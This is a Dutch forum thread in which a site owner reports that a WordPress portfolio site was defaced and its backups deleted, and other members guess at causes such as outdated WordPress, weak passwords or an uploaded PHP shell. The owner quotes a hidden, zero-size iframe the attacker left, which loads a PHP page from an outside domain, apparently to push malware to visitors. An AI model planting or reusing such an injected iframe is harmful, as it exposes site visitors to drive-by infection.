Vandaag kwam ik er achter dat mijn portfolio website gehacked is. Ik begrijp niet hoe dit kon gebeuren. Wellicht zijn hier mensen die weten of er een lek o.i.d. aanwezig is.

Hetgeen wat onze misgunner achtergelaten heeft:
hacked by

Ik kan nog wel inloggen in de directadmin. Helaas was hier alles verwijderd, zelfs de backups. Wat bezielt die hackers in godsnaam? Ik begrijp echt niet waar het voor nodig is.

Iemand tips hoe alles terug te krijgen en alles beter te beschermen o.i.d.?

Luuk

Waarschijnlijk is dit gekomen door het niet of te laat updaten van wordpress, aangezien ik via google cache kan zien dat er wordpress was gebruikt.

Virusscanner slaat op hol als ik de site bezoek. Stond er een CMS (Content Management System) op de site?

Maar backups uit DA verwijderen kan toch alleen door in te loggen op DA? Misschien een zwak wachtwoord?

Origineel gepost door Robin C

Waarschijnlijk is dit gekomen door het niet of te laat updaten van wordpress, aangezien ik via google cache kan zien dat er wordpress was gebruikt.

Er stond inderdaad wordpress op geinstalleerd.

Naar mijn weten heb ik dit altijd netjes bijgehouden. Maar het zou dus kunnen komen omdat ik toevallig 1 versie achter liep?

Het wachtwoord bestond overigens uit cijfers en letters, niet gemakkelijk dus.

Waar had je je hosting gekocht? hebben hun misschien geen backup voor je?

Check even de login history van je DirectAdmin.

Er zijn verschillende methodes om binnen te dringen in een website. Informatie: http://nl.wikipedia.org/wiki/SQL_injection
http://nl.wikipedia.org/wiki/Cross-site_scripting

Er is een persoon hier op sitedeals die daar veel van af weet. Ik ben even de naam vergeten. Wellicht kan hij je helpen om je website veilig te maken.

ja maar met wordpress mag je toch verwachten dat dit veilig is ?

@Matthijs, dat klopt. Maar wordpress word nog altijd gemaakt door mensen en kunnen fouten in zitten.

Robin

wordpress is opensource en dat betekend dat iedereen de broncode kan zien.
Het word veel gebruikt dus is het HEEL aantrekkelijk om lekken erin te misbruiken.

http://www.google.com.au/search?as_q...=Google+zoeken

Als je dan eenmaal een lek vind in wordpress heb je duizende websites die je kunt kraken.
Daarom ben ik geen voorstander van opensource CMS's

Origineel gepost door Robbin de Kruijf

Waar had je je hosting gekocht? hebben hun misschien geen backup voor je?

Antagonist, en ik heb hun gemailt. Maar ze maken geen automatische back-ups. Verder krijg ik er wel leuk tips van, dat ik wachtwoorden moet veranderen maar dat kan ik zelf ook nog wel bedenken.

De login history in de directadmin heb ik ook bekeken, maar geen andere ip's te bekennen. Kan je die verwijderen of?
Aanvullend bericht:
In het .html bestand wat hij had achtergelaten zat overigens nog wel dit (Link niet aanklikken, kan een virus zijn):
<iframe src="http://rerreas.in/sss/abominableabolition.php" style="visibility: hidden; display: none; width: 0px; height: 0px;"></iframe>

Een virus of iets dergelijks, iemand die weet wat het precies is?. Maar is er op één of andere manier niet te achterhalen wie het gedaan heeft?

misschien is het dus niet via de directadmin gebeurt, maar via de ftp.
het is mogelijk dat mensen dan pagina's maken met daarin query's om gegevens uit DA te verwijderen

Origineel gepost door Bas Korteweg

misschien is het dus niet via de directadmin gebeurt, maar via de ftp.
het is mogelijk dat mensen dan pagina's maken met daarin query's om gegevens uit DA te verwijderen

Dat gebeurd trouwens met een shell. Dat is een simpele php file waarmee ftp toegang verkregen kan worden. Heb je misschien een plugin of zoiets gedownload waarmee bezoekers bestanden kunnen uploaden op de website?

Men heeft ook helemaal geen toegang tot DirectAdmin of FTP gekregen, waarschijnlijk gewoon de wordpress installatie een tijd niet geupgrade, waardoor er door een exploit toegang tot het filesystem is verkregen. Dan kun je ook gewoon de user backup directory in en leuk de backupjes verwijderen.